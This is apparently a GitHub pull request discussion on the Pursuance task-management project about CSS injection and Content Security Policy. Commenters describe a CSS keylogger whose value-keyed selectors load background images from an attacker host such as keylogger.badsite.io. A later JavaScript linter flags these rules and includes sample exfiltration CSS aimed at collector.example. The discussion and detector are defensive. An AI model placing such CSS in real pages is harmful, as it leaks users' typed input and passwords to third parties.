PursuanceProject / pursuance

Pursuance: end-to-end encrypted task management optimized for large numbers of volunteers. We are building a vast and formidable ecosystem of opposition to institutionalized injustice.
https://pursuanceproject.org/

I 217 clear right filter #220

Closed 4xdk closed 6 years ago

4xdk commented 6 years ago

As per Issue 217 - https://github.com/PursuanceProject/pursuance/issues/217

elimisteve commented 6 years ago

@4xdk https://stackoverflow.com/a/718614

elimisteve commented 6 years ago

@4xdk See also https://stackoverflow.com/questions/30653698/csp-style-src-unsafe-inline-is-it-worth-it#31759553

elimisteve commented 6 years ago

I just watched https://m.youtube.com/watch?v=eb3suf4REyI, which provides some explicit examples of how CSS injections can lead to issues like data exfiltration from the page to another domain controlled by the attacker.

elimisteve commented 6 years ago

I need to better understand how this CSS keylogger works: https://no-csp-css-keylogger.badsite.io

4xdk commented 6 years ago

Looks like there's a whole bunch of CSS rules for the input values (value ending with aa, ab, ac, etc.) which change the background-image CSS rule to e.g. background-image: url("//keylogger.badsite.io/ab"), initiating a GET request and passing this data to be joined on the server.

Interesting thing about this is that it's not that reliable. Each request gets sent only once, so a password such as "aaaa" sends info about "a" and "aa" being present, nothing about the latter 2 characters in it. Still, an issue of course.
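The pattern described in the comment above can be caught in review before a stylesheet reaches the page. The following is an added example, not code from the Pursuance project: a small linter that flags CSS rules keyed on an input's `value` attribute that load a URL from an origin other than the app's own. The stylesheet and the `https://app.example` origin are constructed sample values.

```javascript
// Added example, not code from the Pursuance project. Flags the CSS pattern
// described in the comment above: rules keyed on an input's "value"
// attribute that load a URL from a different origin, which is how each
// typed fragment turns into a request to another server.
// The stylesheet below is constructed sample input; the origin is assumed.

function originOf(url, ownOrigin) {
  // Relative paths resolve to our own origin; absolute and
  // protocol-relative ("//host/...") URLs resolve to a foreign one.
  try {
    return new URL(url, ownOrigin).origin;
  } catch {
    return null; // unparsable URL: differs from ownOrigin, so it is flagged
  }
}

function findValueExfilRules(cssText, ownOrigin) {
  const findings = [];
  // Crude splitter for flat "selector { declarations }" rules; nested
  // @-rules are out of scope for this example.
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  // Matches [value^=..], [value$=..], [value*=..] etc. in the selector.
  const attrRe = /\[\s*value\s*([\^$*|~]?=)\s*["']?([^"'\]]*)["']?\s*\]/i;
  const urlRe = /url\(\s*["']?([^"')]+)["']?\s*\)/gi;
  for (const rule of cssText.matchAll(ruleRe)) {
    const selector = rule[1].trim();
    const attr = attrRe.exec(selector);
    if (!attr) continue; // not keyed on the field's value
    for (const u of rule[2].matchAll(urlRe)) {
      if (originOf(u[1], ownOrigin) !== ownOrigin) {
        findings.push({ selector, operator: attr[1], fragment: attr[2], url: u[1] });
      }
    }
  }
  return findings;
}

// Constructed sample: one benign same-origin background, two value-keyed
// rules that leak to another host, one foreign rule that is not value-keyed.
const SAMPLE_CSS = `
  input { background-image: url("/static/field-bg.png"); }
  input[value$="aa"] { background-image: url("//collector.example/aa"); }
  input[value$="ab"] { background-image: url("//collector.example/ab"); }
  .banner { background: url("https://cdn.example/banner.png"); }
`;

const report = findValueExfilRules(SAMPLE_CSS, "https://app.example");
console.log(report.length, "value-keyed cross-origin rule(s) found"); // prints 2
```

Only the two value-keyed rules are reported; the CDN banner is a foreign load but cannot encode what the user typed. A CSP with a `style-src` that omits `'unsafe-inline'` and an `img-src` limited to the app's own origin, as discussed in the links above, blocks the same pattern at the browser.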

4xdk commented 6 years ago

Gotcha, I meant to add padding on the field to avoid that but this sounds even better.